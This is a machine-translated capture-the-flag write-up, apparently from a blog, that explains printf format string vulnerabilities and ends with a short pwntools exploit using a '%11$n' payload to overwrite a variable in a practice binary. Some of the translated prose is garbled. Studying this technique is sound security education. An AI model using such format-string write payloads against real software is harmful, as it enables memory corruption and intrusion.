Stack overflow basic exercise - 5 (string vulnerability)

Title address ： Please have a look at pwn Stack overflow basic exercises ——1 ; Put all the exercise topics of this blog
fmtstr1

printf Summary of vulnerability

printf Formatting vulnerability

%s： Take the referred spatial data as the address , Output the data in this address
%p： The address index of the output address itself
%n： Write the number of successful characters in front of the address , And %s similar ,%s Yes. ,%n Yes. , Write four bytes at a time

print(“%p%p%p”) Space call graph of ：

"%p%p%p" As printf() The first parameter of , Indicates the format of the output , Because the second parameter is not given , Then it defaults to output up in sequence
When we can control printf() Function parameters , You can easily obtain any data

tips:
print(“%3$d”,a,b,c) 3$ It means to print the third parameter directly , Here for c

adopt printf() Disclose any address flow chart ：

When we construct printf(“%p%p%p%p”) when , The address space is ：

Findings will be %p%p%p%p Deposit in 0xffffd1bc, And will 0xffffd1bc Address deposit printf() Parameters 1 The location of , So when we will %p%p%p%p When changing to address , Then the address value can be stored in 0xffffd1bc, If we can use %s Format parameters can be 0xffffd1bc Address content as address , Output the value of this address , That means we can go through printf(“ Address values %s”) Class to output the contents stored at any address .

Analysis of exercises

Open the Canary Protect , But the address is not randomized
Put the title in ida

Find a hole printf(&buf), also buf Content by read Function write , Then we can control

1. printf(&buf) There is only one parameter
2. buf Can be controlled
   To sum up, there are printf() Loophole
   Obviously, our goal is to x Is set to 4, stay printf() In vulnerability %n Formatting is qualified for writing
   Ideas ： adopt printf() Loophole , utilize %n take x To change the value of 4
   Through the first ida find x The address of , And found x The value is 3
   
   Dynamic debugging , Input AAAAAAAA, And in printf() Check the stack at the function
   
   Our aim is to make 0xffffd070 Place for x The address of , such x The value of the address will be stored 0xffffd09c in , Second, let %n Can control 0xffffd09c The contents of the stored address . Look at the ,0xffffd070 by printf() Function first argument , The following is the format string parameter , namely 0xffffd074 For format string number 1 Parameters ,0xffffd09c It is the first 11 Parameters , And because of x My address is 4 byte ,%n=4, Just meet x=4 The requirements of , So construct printf(“x_addr%11$n”)
   Attack code ：

from pwn import *
io = process("./fmtstr1")
payload = p32(0x0804A02C) + b"%11$n"
io.send(payload)
io.interactive()